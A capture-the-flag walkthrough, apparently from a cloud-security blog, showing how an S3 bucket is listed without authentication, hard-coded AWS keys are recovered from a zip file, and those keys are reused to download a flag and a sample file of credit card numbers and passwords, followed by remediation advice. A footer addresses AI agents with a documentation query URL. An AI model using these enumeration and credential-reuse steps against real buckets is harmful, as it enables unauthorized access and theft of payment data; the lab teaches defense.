# S3 Enumeration Basics

CTF Source: [Pwned Labs](https://pwnedlabs.io/labs/aws-s3-enumeration-basics)

## Overview

In this walkthrough, we're provided with a website link. After discovering the site is hosted on AWS S3, we'll learn how to enumerate S3 and, due to a misconfiguration, uncover additional credentials leading to the compromise of several secrets and credit card data.

## Pre-Requisites

* Install awscli: `(brew/apt) install awscli`

## Walkthrough

### Finding and Accessing the S3 Bucket

We'll start by visiting the website in our browser and inspecting its source code.&#x20;

We'll discover the website is retrieving content from S3.

<figure><img src="/files/cflE1RwdyLqlp8wmNgMF" alt=""><figcaption></figcaption></figure>

If we attempt to navigate to the CSS file, we'll discover we can see it.&#x20;

<figure><img src="/files/6lI6f6i2g1TVjgmlOGOb" alt=""><figcaption></figcaption></figure>

Let's try to traverse the directories of this bucket to see if we can access other files.&#x20;

<figure><img src="/files/zbF64xONxYiCw4EeGYa1" alt=""><figcaption></figcaption></figure>

Let's try using the `awscli` like so.

```bash
aws s3 ls s3://dev.huge-logistics.com --no-sign-request      
  
                           PRE admin/
                           PRE migration-files/
                           PRE shared/
                           PRE static/
2023-10-16 11:00:47       5347 index.html 
```

* `--no-sign-request` is needed so we’re not signing the request with any local AWS credentials

Okay, now we're noticing some files!&#x20;

It doesn't appear we can list contents for anything but `shared/`

```bash
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request

2023-10-16 09:08:33          0 
2023-10-16 09:09:01        993 hl_migration_project.zip
```

Let's attempt to download this file.

{% code overflow="wrap" %}

```bash
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip --no-sign-request .

download: s3://dev.huge-logistics.com/shared/hl_migration_project.zip to ./hl_migration_project.zip
```

{% endcode %}

Nice! Let's open it up and see what we can find.

### Finding Credentials

Unzipping the file

```
unzip ./hl_migration_project.zip
```

Reading the contents

```
cat migrate_secrets.ps1 

# AWS Configuration
$accessKey = "AKIA3[snip]"
$secretKey = "MwGe3[snip]"
$region = "us-east-1"
[snip]
```

We found some creds!&#x20;

### Gaining Access to migration-files

We can use the command `aws configure` and set up the credentials we just found.

Let's try to enumerate those `admin` files we found previously.&#x20;

```bash
aws s3 ls s3://dev.huge-logistics.com/admin/       
                     
2023-10-16 09:08:38          0 
2023-10-16 09:10:51         32 flag.txt
2023-10-16 14:24:07       2425 website_transactions_export.csv
```

Okay, we're getting somewhere. Can we download the data?

```bash
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt .

fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden
```

Nope... Let's move on to those `migration-files` and try that.&#x20;

{% code overflow="wrap" %}

```bash
aws s3 ls s3://dev.huge-logistics.com/migration-files/       
           
2023-10-16 09:08:47          0 
2023-10-16 09:09:26    1833646 AWS Secrets Manager Migration - Discovery & Design.pdf
2023-10-16 09:09:25    1407180 AWS Secrets Manager Migration - Implementation.pdf
2023-10-16 09:09:27       1853 migrate_secrets.ps1
2023-10-16 12:00:13       2494 test-export.xml
```

{% endcode %}

{% code overflow="wrap" %}

```bash
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .   
 
download: s3://dev.huge-logistics.com/migration-files/test-export.xml to ./test-export.xml
```

{% endcode %}

Nice! Let's read the files.

{% code overflow="wrap" %}

```bash
cat test-export.xml 
   
<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
    <!-- Oracle Database Credentials -->
[SNIP]
    </CredentialEntry>
    <!-- AWS Production Credentials -->
    <CredentialEntry>
        <ServiceType>AWS IT Admin</ServiceType>
```

{% endcode %}

Looks like we found several credentials for various systems! Let's test out the `AWS IT Admin` creds.

### Gaining Access to admin&#x20;

Again, we'll set up our credentials like so,

```
aws configure --profile it-admin
```

Let's try to download those admin files now.

{% code overflow="wrap" %}

```bash
aws --profile it-admin s3 cp s3://dev.huge-logistics.com/admin/flag.txt .

download: s3://dev.huge-logistics.com/admin/flag.txt to ./flag.txt
```

{% endcode %}

```
cat ./flag.txt     

a49f1[snip]
```

Success! We found the flag! Likewise, if we download the other file, `website_transactions_export.csv` we'll uncover some plaintext credit card information!

{% code overflow="wrap" %}

```bash
cat website_transactions_export.csv 

network,credit_card_number,cvv,expiry_date,card_holder_name,validation,username,password,ip_address
Visa,4055497191304,386,5/2021,Hunter Miller,,hunter_m,password123,34.56.78.90
Visa,4055491339081,492,8/2021,Jayden Adams,,jay_adams,jayden2023,157.89.34.56
[SNIP]
```

{% endcode %}

## Wrap-up

In this scenario, unauthorized access was obtained to a shared folder within the S3 bucket without authentication. Subsequently, a zip file was downloaded from this folder, revealing a script embedded with hard-coded AWS credentials. These credentials were leveraged to access the `/migration-files/` folder, where a file containing additional hard-coded credentials, including those for the `AWS IT Admin` user, was retrieved. Utilizing the IT Admin credentials, we successfully obtained the flag and plaintext credit card data from the `/admin/` directory of the S3 bucket.

Let's discuss a few issues we uncovered along the way,

1. Multi-use of an S3 bucket
   * It's clear that this bucket was used for multiple purposes (website hosting, credit card data storage, and some sort of secrets management migration)
   * Multi-use of a bucket like this can lead to unintentional consequences as we uncovered&#x20;
   * Recommendation:

     * Separate buckets should be utilized for different use cases to reduce the likelihood of permission misconfiguration

2. Mishandling of credit card data
   * The credit card data found was unencrypted and not stored in an appropriate location
   * Recommendation:

     * Encrypt credit card data
     * Store this data in an appropriate location and restrict access

3. World-readable `shared` directory
   * This directory was accessible by anyone and contained hard-coded secrets to several solutions.&#x20;
   * The exposed secrets enabled privilege escalation, ultimately leading to the exfiltration of credit card data.
   * Recommendation:
     * Store this data in an appropriate location and restrict access
     * If the data needs to be shared externally, consider enabling cross-account access via an IAM Role or sharing in an alternative secure solution.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/pwnedlabs/s3-enumeration-basics.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.